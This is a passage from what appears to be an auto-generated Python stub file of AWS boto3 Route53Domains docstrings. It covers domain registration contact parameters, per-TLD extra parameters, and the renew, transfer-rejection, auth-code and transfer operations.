Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
DomainName (string) -- [REQUIRED]
The domain name that you want to register. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
The domain name can contain only the following characters:
Letters a through z. Domain names are not case sensitive.
Numbers 0 through 9.
Hyphen (-). You can\'t specify a hyphen at the beginning or end of a label.
Period (.) to separate the labels in the name, such as the . in example.com .
Internationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .
IdnLangCode (string) -- Reserved for future use.
DurationInYears (integer) -- [REQUIRED]
The number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
Default: 1
AutoRenew (boolean) -- Indicates whether the domain will be automatically renewed (true ) or not (false ). Autorenewal only takes effect after the account is charged.
Default: true
AdminContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
TechContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
PrivacyProtectAdminContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
Default: true
PrivacyProtectRegistrantContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (the domain owner).
Default: true
PrivacyProtectTechContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
Default: true
"""
pass
def reject_domain_transfer_from_another_aws_account(DomainName=None):
"""
Rejects the transfer of a domain from another AWS account to the current AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.reject_domain_transfer_from_another_aws_account(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that was specified when another AWS account submitted a TransferDomainToAnotherAwsAccount request.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string'
}
Response Structure
(dict) --The RejectDomainTransferFromAnotherAwsAccount response includes the following element.
OperationId (string) --The identifier that TransferDomainToAnotherAwsAccount returned to track the progress of the request. Because the transfer request was rejected, the value is no longer valid, and you can\'t use GetOperationDetail to query the operation status.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
"""
pass
def renew_domain(DomainName=None, DurationInYears=None, CurrentExpiryYear=None):
"""
This operation renews a domain for the specified number of years. The cost of renewing your domain is billed to your AWS account.
We recommend that you renew your domain several weeks before the expiration date. Some TLD registries delete domains before the expiration date if you haven\'t renewed far enough in advance. For more information about renewing domain registration, see Renewing Registration for a Domain in the Amazon Route 53 Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.renew_domain(
DomainName='string',
DurationInYears=123,
CurrentExpiryYear=123
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to renew.\n
:type DurationInYears: integer
:param DurationInYears: The number of years that you want to renew the domain for. The maximum number of years depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nDefault: 1\n
:type CurrentExpiryYear: integer
:param CurrentExpiryYear: [REQUIRED]\nThe year when the registration for the domain is set to expire. This value must match the current expiration date for the domain.\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
"""
pass
def resend_contact_reachability_email(domainName=None):
"""
For operations that require confirmation that the email address for the registrant contact is valid, such as registering a new domain, this operation resends the confirmation email to the current email address for the registrant contact.
See also: AWS API Documentation
Exceptions
:example: response = client.resend_contact_reachability_email(
domainName='string'
)
:type domainName: string
:param domainName: The name of the domain for which you want Route 53 to resend a confirmation email to the registrant contact.
:rtype: dict
ReturnsResponse Syntax{
'domainName': 'string',
'emailAddress': 'string',
'isAlreadyVerified': True|False
}
Response Structure
(dict) --
domainName (string) --The domain name for which you requested a confirmation email.
emailAddress (string) --The email address for the registrant contact at the time that we sent the verification email.
isAlreadyVerified (boolean) --
True if the email address for the registrant contact has already been verified, and false otherwise. If the email address has already been verified, we don\'t send another confirmation email.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'domainName': 'string',
'emailAddress': 'string',
'isAlreadyVerified': True|False
}
"""
pass
def retrieve_domain_auth_code(DomainName=None):
"""
This operation returns the AuthCode for the domain. To transfer a domain to another registrar, you provide this value to the new registrar.
See also: AWS API Documentation
Exceptions
:example: response = client.retrieve_domain_auth_code(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get an authorization code for.\n
:rtype: dict
ReturnsResponse Syntax{
'AuthCode': 'string'
}
Response Structure
(dict) --The RetrieveDomainAuthCode response includes the following element.
AuthCode (string) --The authorization code for the domain.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'AuthCode': 'string'
}
"""
pass
def transfer_domain(DomainName=None, IdnLangCode=None, DurationInYears=None, Nameservers=None, AuthCode=None, AutoRenew=None, AdminContact=None, RegistrantContact=None, TechContact=None, PrivacyProtectAdminContact=None, PrivacyProtectRegistrantContact=None, PrivacyProtectTechContact=None):
"""
Transfers a domain from another registrar to Amazon Route 53. When the transfer is complete, the domain is registered either with Amazon Registrar (for .com, .net, and .org domains) or with our registrar associate, Gandi (for all other TLDs).
For more information about transferring domains, see the following topics:
If the registrar for your domain is also the DNS service provider for the domain, we highly recommend that you transfer your DNS service to Route 53 or to another DNS service provider before you transfer your registration. Some registrars provide free DNS service when you purchase a domain registration. When you transfer the registration, the previous registrar will not renew your domain registration and could end your DNS service at any time.
If the transfer is successful, this method returns an operation ID that you can use to track the progress and completion of the action. If the transfer doesn\'t complete successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.transfer_domain(
DomainName='string',
IdnLangCode='string',
DurationInYears=123,
Nameservers=[
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
AuthCode='string',
AutoRenew=True|False,
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
